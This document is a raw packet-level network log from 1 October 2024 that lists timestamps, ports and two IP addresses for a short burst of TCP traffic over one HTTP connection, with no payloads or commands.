Oct 1, 2024 19:32:05.393182039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393193007 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393224001 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.393366098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393381119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393393040 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393419981 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.393431902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393438101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.393444061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393455029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393465042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393470049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.393488884 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.393517017 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.393537998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393548012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393558025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393568039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393577099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.393579006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393589973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.393605947 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.393620968 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.394278049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394288063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394299030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394325018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.394335032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.394354105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394364119 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394372940 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394383907 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394392967 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.394411087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.394435883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.394772053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394783020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394792080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394824028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.394830942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394840002 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.394840956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394851923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394861937 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.394867897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.394885063 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.394897938 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.395340919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395350933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395360947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395371914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395382881 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395386934 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.395401955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395410061 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.395420074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395431042 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395437956 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.395442009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395456076 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.395476103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.395904064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395915031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395925045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395936012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395946026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.395953894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.395979881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.395991087 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.396265030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.396311045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.396450043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.396459103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.396467924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.396478891 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.396490097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.396493912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.396502018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.396512032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.396518946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.396538019 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.396557093 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.399024963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399069071 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.399105072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399115086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399126053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399136066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399218082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399226904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399240017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399255991 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399266958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399276018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399286985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399300098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399301052 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.399312019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.399346113 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.399368048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.400113106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.400163889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.400166035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.400173903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.400201082 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.400209904 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.400218964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.400221109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.400230885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.400245905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.400264978 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.400274038 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.400391102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.400432110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.400439024 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.400443077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.400465012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.400477886 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.400629997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.400640965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.400650978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.400671959 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.400695086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.479614019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.479628086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.479640961 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.479665041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.479682922 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.479695082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.479708910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.479737043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.479753971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.480590105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.480602026 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.480618954 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.480629921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.480640888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.480648041 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.480654001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.480667114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.480685949 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.480706930 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517244101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517292023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517332077 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517342091 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517348051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517359972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517371893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517379045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517385006 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517396927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517416000 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517435074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517440081 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517447948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517472029 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517481089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517492056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517493963 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517503023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517513990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517523050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517544031 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517617941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517628908 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517638922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517657042 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517667055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517688036 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517693043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517704964 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517715931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517728090 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517746925 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517756939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517838001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517848969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517860889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.517877102 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517887115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.517904997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518260956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518279076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518289089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518310070 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518322945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518322945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518335104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518347025 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518361092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518373966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518388033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518397093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518402100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518415928 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518440008 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518470049 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518482924 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518496037 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518507957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518512011 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518533945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518543005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518556118 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518558025 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518568039 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518582106 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518594027 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518611908 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518673897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518686056 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518698931 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518711090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518713951 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518721104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518727064 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518745899 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518769979 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518809080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518820047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518831968 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.518847942 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518861055 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.518872023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519054890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519066095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519076109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519087076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519098043 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519104004 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519110918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519121885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519131899 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519134045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519140959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519151926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519167900 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519188881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519192934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519210100 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519228935 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519232035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519242048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519244909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519254923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519260883 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519267082 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519282103 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519295931 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519309044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519320011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519330978 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519341946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519345045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519351959 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519367933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519408941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519448996 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519484997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519496918 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519507885 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519531965 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519540071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519546032 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519576073 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519628048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519639015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519655943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519666910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519668102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519676924 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519680977 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519695997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519695997 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519709110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519722939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519722939 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519750118 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519784927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519824028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519840956 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519853115 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519876957 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519886971 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519900084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519910097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519921064 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519932985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.519932985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519953012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519964933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.519998074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520008087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520019054 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520030022 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520035028 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520041943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520052910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520060062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520062923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520086050 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520095110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520210981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520252943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520255089 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520265102 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520286083 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520299911 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520306110 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520328999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520342112 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520368099 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520430088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520442009 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520457029 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520469904 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520497084 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520497084 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520514011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520525932 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520535946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520539045 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520546913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520560980 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520580053 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520606041 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520617962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520628929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520639896 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 19:32:05.520642996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 19:32:05.520651102 CEST	49704	80	192.168.2.5	185.215.113.37
